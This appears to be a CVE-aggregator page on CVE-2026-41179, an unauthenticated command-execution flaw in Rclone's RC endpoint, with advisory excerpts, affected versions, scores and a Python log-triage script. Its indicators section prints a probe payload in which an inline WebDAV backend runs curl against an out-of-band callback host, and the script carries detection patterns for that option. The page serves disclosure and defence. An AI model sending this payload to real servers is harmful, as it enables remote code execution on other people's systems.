CVE-2026-41179
Published 2026-04-23
Priority P180 · critical · 9.8 (CVSS 3.1)
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 9.20% (94.7th percentile)
Rclone is a command-line program to sync files and directories to and from different cloud storage providers. Starting in version 1.48.0 and prior to version 1.73.5, the RC endpoint `operations/fsinfo` is exposed without `AuthRequired: true` and accepts attacker-controlled `fs` input. Because `rc.GetFs(...)` supports inline backend definitions, an unauthenticated attacker can instantiate an attacker-controlled backend on demand. For the WebDAV backend, `bearer_token_command` is executed during backend initialization, making single-request unauthenticated local command execution possible on reachable RC deployments without global HTTP authentication. Version 1.73.5 patches the issue.
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| github.com | rclone_rclone | >= 1.46.0 < 1.74.3 | 1.74.3 |
| github.com | rclone_rclone | >= 1.48.0 < 1.73.5 | 1.73.5 |
| oadp | oadp-mustgather-rhel9 | — | — |
| oadp | oadp-velero-restic-restore-helper-rhel9 | — | — |
| oadp | oadp-velero-rhel9 | — | — |
| rclone | rclone | — | — |
| rclone | rclone | >= 1.48.0 < 1.73.5 | 1.73.5 |
| rhacm2 | volsync-rhel9 | — | — |
| ubuntu | rclone | — | — |
Detection & IOCs
url: /rc/noop
url: /operations/fsinfo
command: {"fs":":webdav,url='http://{{interactsh-url}}/',vendor=other,bearer_token_command='curl http://{{interactsh-url}}/{{randstr}}':"}
- Probe for unauthenticated RC endpoint availability by sending an empty POST to /rc/noop and checking for HTTP 200 with JSON content-type before attempting exploitation.
- Detect exploitation attempts targeting /operations/fsinfo with inline WebDAV backend definitions containing bearer_token_command in the fs parameter; a single unauthenticated POST is sufficient for RCE.
- The RC server must be started via `rclone rcd` or the `--rc` flag and deployed without authentication for the vulnerability to be exploitable; monitor for rclone RC server processes exposed beyond localhost.
- The vulnerability exists in Rclone versions >= 1.48.0 and < 1.73.5; flag any deployment of these versions with an exposed RC endpoint.
- The attack vector is the inline backend definition syntax in the `fs` parameter (e.g., `:webdav,...,bearer_token_command='...':`); inspect POST bodies to /operations/fsinfo for this pattern.
- For the WebDAV backend specifically, bearer_token_command is executed at backend initialization time; monitor for outbound network connections or process spawns originating from the rclone process shortly after a POST to /operations/fsinfo.
- Exploitation requires the RC server to be running (via `rclone rcd` or `--rc` flag) AND configured without global HTTP authentication. Deployments with authentication enabled are not directly vulnerable.
- Red Hat notes that because their products expose the RC server only to localhost, the practical impact is reduced; network-exposed RC deployments are the primary risk.
- The fix is in version 1.73.5; the patch adds `AuthRequired: true` to the `operations/fsinfo` endpoint to prevent unauthenticated access.
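The detection notes above can be turned into a log-triage check. The following is an added example, not code from rclone or from any of the quoted sources: it classifies logged RC requests by whether the `fs` value is an inline backend definition carrying `bearer_token_command`, and tests a version string against the affected range. The function names, the record layout and the sample requests are assumptions constructed for illustration.

```python
import json
import re

AFFECTED_MIN = (1, 48, 0)  # first affected release, per the advisory text
FIXED_IN = (1, 73, 5)      # first patched release, per the advisory text

# Inline backend definition in `fs`: ":backend,key=value,...:" optionally followed by a path.
INLINE_BACKEND = re.compile(r"^\s*:(?P<backend>[\w-]+)(?P<opts>,.*)?:", re.S)
# The option this page names as running a local command during backend init.
COMMAND_OPTION = re.compile(r",\s*bearer_token_command\s*=", re.I)


def version_affected(version):
    """True if a version string such as 'v1.73.4' lies in [1.48.0, 1.73.5)."""
    m = re.match(r"v?(\d+)\.(\d+)(?:\.(\d+))?", version.strip())
    if not m:
        raise ValueError(f"unrecognised version: {version!r}")
    return AFFECTED_MIN <= tuple(int(p or 0) for p in m.groups()) < FIXED_IN


def classify_request(method, path, body, authenticated):
    """Classify one logged RC request as 'ok', 'suspicious' or 'alert'.

    Only JSON bodies are parsed here (a simplification of this example).
    """
    if method.upper() != "POST" or path.rstrip("/") != "/operations/fsinfo":
        return "ok"
    try:
        fs = json.loads(body)["fs"]
    except (ValueError, KeyError, TypeError):
        return "suspicious"  # unparseable body sent to a sensitive endpoint
    inline = INLINE_BACKEND.match(fs) if isinstance(fs, str) else None
    if inline is None:
        return "ok"  # named remote or plain path, nothing defined inline
    if COMMAND_OPTION.search(inline.group("opts") or ""):
        return "alert"  # inline backend carrying a command-executing option
    return "ok" if authenticated else "suspicious"


def fsinfo_request(fs, authenticated=False):
    """Build one constructed log record for a POST to /operations/fsinfo."""
    return ("POST", "/operations/fsinfo", json.dumps({"fs": fs}), authenticated)


# Constructed sample records (method, path, body, authenticated); not real traffic.
SAMPLE_REQUESTS = [
    ("POST", "/rc/noop", "{}", False),
    fsinfo_request("backup:photos"),
    fsinfo_request(":webdav,url='http://dav.invalid/',vendor=other:"),
    fsinfo_request(":webdav,url='http://dav.invalid/',vendor=other,bearer_token_command='PLACEHOLDER':"),
]

if __name__ == "__main__":
    for record in SAMPLE_REQUESTS:
        print(classify_request(*record), record[2])
    print("1.73.4 affected:", version_affected("1.73.4"))
```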
CVSS provenance
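| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v4.0 | 9.2 | CRITICAL | CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X |
| ghsa | — | 9.8 | CRITICAL | — |
| vendor_redhat | — | 9.2 | CRITICAL | — |
| vendor_ubuntu | — | 9.2 | CRITICAL | — |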
Ubuntu
Rclone vulnerabilities
vendor_ubuntu·2026-05-25·CVSS 9.2
CVE-2026-41176 [CRITICAL] Rclone vulnerabilities
Title: Rclone vulnerabilities
Summary: Several security issues were fixed in Rclone.
It was discovered that Rclone incorrectly handled authorization in the remote
control API. An attacker could possibly use this issue to obtain sensitive
information. (CVE-2026-41176)
It was discovered that Rclone incorrectly handled backend instantiation via the
remote control API. An attacker could possibly use this issue to execute
arbitrary code. This issue only affected Ubuntu 24.04 LTS, Ubuntu 25.10 and
Ubuntu 26.04 LTS. (CVE-2026-41179)
Instructions: In general, a standard system update will make all the necessary changes.
Red Hat
github.com/rclone/rclone: Rclone: Unauthenticated local command execution via exposed RC endpoint
vendor_redhat·2026-04-23·CVSS 9.2
CVE-2026-41179 [CRITICAL] CWE-94 github.com/rclone/rclone: Rclone: Unauthenticated local command execution via exposed RC endpoint
A flaw was found in Rclone, a command-line program for syncing files with cloud storage. An unauthenticated attacker can exploit an exposed Remote Control (RC) endpoint, `operations/fsinfo`, to instantiate a malicious backend. This allows the attacker to execute arbitrary local commands during backend initialization, leading to unauthenticated local command execution on reachable RC deployments.
Statement: The vulnerable functionality exists in the RC server. Thus, for the vulnerability to be exploited, the RC server must be started, via `rclone rcd` or the `--rc` flag. Additionally, the RC server must be deployed without any required authentication. Because Red Hat products either do not in
GHSA
Rclone: Unauthenticated command execution in `rclone rcd --rc-serve` via inline remote instantiation, bypassing CVE-2026-41179 fix
ghsa·2026-06-16·CVSS 9.8
CVE-2026-49980 [CRITICAL] CWE-306 Rclone: Unauthenticated command execution in `rclone rcd --rc-serve` via inline remote instantiation, bypassing CVE-2026-41179 fix
## Summary
`rclone rcd --rc-serve` accepts unauthenticated `GET` and `HEAD` requests to paths of the form:
```text
/[remote:path]/object
```
The `remote` value is parsed from the URL and passed to normal backend initialization. Inline remote configuration can set backend options that execute local commands during initialization. As a result, a single unauthenticated `GET` or `HEAD` request can execute a command as the rclone process user.
Versions from 1.55.0 onwards are vulnerable to command execution. Earlier versions (from 1.46.0) are vulnerable to the unauthenticated local file read described under "Additional impact" but not to command execution, beca
VulDB
Rclone up to 1.73.4 RC Endpoint operations/fsinfo bearer_token_command os command injection (GHSA-jfwf-28xr-xw6q / Nessus ID 314577)
vuldb·2026-05-14·CVSS 9.2
CVE-2026-41179 [CRITICAL] Rclone up to 1.73.4 RC Endpoint operations/fsinfo bearer_token_command os command injection (GHSA-jfwf-28xr-xw6q / Nessus ID 314577)
A vulnerability identified as critical has been detected in Rclone up to 1.73.4. This affects the function bearer_token_command of the file operations/fsinfo of the component RC Endpoint. The manipulation leads to os command injection.
This vulnerability is documented as CVE-2026-41179. The attack can be initiated remotely. There is not any exploit available.
You should upgrade the affected component.
GHSA
RClone: Unauthenticated operations/fsinfo allows attacker-controlled backend instantiation and local command execution
ghsa·2026-04-22
CVE-2026-41179 [CRITICAL] CWE-306 RClone: Unauthenticated operations/fsinfo allows attacker-controlled backend instantiation and local command execution
### Summary
The RC endpoint `operations/fsinfo` is exposed without `AuthRequired: true` and accepts attacker-controlled `fs` input. Because `rc.GetFs(...)` supports inline backend definitions, an unauthenticated attacker can instantiate an attacker-controlled backend on demand. For the WebDAV backend, `bearer_token_command` is executed during backend initialization, making single-request unauthenticated local command execution possible on reachable RC deployments without global HTTP authentication.
### Preconditions
Preconditions for this vulnerability are:
- The rclone remote control API **must** be enabled, either by the `--rc` flag or by running the `rclone rcd` ser
No detection rules found.
Nuclei
RClone RC - Command Injection
nuclei·CVSS 9.2
CVE-2026-41179 [CRITICAL] RClone RC - Command Injection
Rclone >= 1.48.0 and < 1.73.5 contains an unauthenticated local command execution caused by unauthenticated access to the RC endpoint operations/fsinfo with attacker-controlled fs input, letting unauthenticated attackers execute local commands, exploit requires reachable RC deployment without global HTTP authentication.
impact: |
Unauthenticated attackers can execute local commands remotely, potentially leading to full system compromise.
remediation: |
Update to version 1.73.5 or later.
reference:
- https://github.com/rclone/rclone/security/advisories/GHSA-jfwf-28xr-xw6q
- https://nvd.nist.gov/vuln/detail/CVE-2026-41179
classification:
cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
cvss-score: 9.2
cve-id: CVE-2026-4
Bugzilla
Trackers for CVE-2026-41179 [CRITICAL], "Rclone: Unauthenticated local command execution via exposed RC endpoint":
| Date | Component | Branch | CVSS |
|---|---|---|---|
| 2026-04-30 | rclone-browser | fedora-all | 9.2 |
| 2026-04-30 | restic | epel-all | 9.2 |
| 2026-04-30 | restic | fedora-all | 9.2 |
| 2026-04-30 | rclone-browser | epel-all | 9.2 |
| 2026-04-30 | golang-github-rclone-gofakes3 | fedora-all | 9.2 |
| 2026-04-30 | golang-github-rclone-ftp | fedora-all | 9.2 |
| 2026-04-30 | rclone | fedora-all | 9.2 |
| 2026-04-30 | gphotosdl | fedora-all | 9.2 |
| 2026-04-23 | github.com/rclone/rclone | — | 9.2 |
| 2026-04-23 | rclone | epel-all | 9.2 |
Disclaimer (on the fedora-all and epel-all trackers): Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Hackernews
⚡ Weekly Recap: Browser Bugs, EDR Killers, TV Botnet, OpenBSD Flaw, Android Trojan, and More
blogs_hackernews·2026-06-22·CVSS 9.8
CVE-2026-24858 [CRITICAL] ⚡ Weekly Recap: Browser Bugs, EDR Killers, TV Botnet, OpenBSD Flaw, Android Trojan, and More
## ⚡ Weekly Recap: Browser Bugs, EDR Killers, TV Botnet, OpenBSD Flaw, Android Trojan, and More
It’s Monday again.
This week’s threat list looks painfully familiar: abused integrations, fake tools, poisoned websites, ransomware crews trying to shut down security tools, and mobile malware asking for way too much control.
The annoying part is how little of this feels new. Weak credentials, sketchy downloads, browser extensions with too much access, and WordPress sites are used to push more attacks. Nothing clever. Just sloppy, cheap, and effective.
Here’s the Monday recap. Let’s get into the week’s mess.
## ⚡ Threat of the We
- https://github.com/rclone/rclone/blob/bf55d5e6d37fd86164a87782191f9e1ffcaafa82/backend/webdav/webdav.go
- https://github.com/rclone/rclone/blob/bf55d5e6d37fd86164a87782191f9e1ffcaafa82/fs/operations/rc.go
- https://github.com/rclone/rclone/blob/bf55d5e6d37fd86164a87782191f9e1ffcaafa82/fs/rc/cache.go
- https://github.com/rclone/rclone/commit/2a9e952b38e03a96bf40c9eb6e8e22199865ee3b
- https://github.com/rclone/rclone/releases/tag/v1.73.5
- https://github.com/rclone/rclone/security/advisories/GHSA-jfwf-28xr-xw6q
- https://rclone.org/changelog/#v1-73-5-2026-04-19
- https://access.redhat.com/security/cve/CVE-2026-41179
- https://bugzilla.redhat.com/show_bug.cgi?id=2460988
- https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-41179.json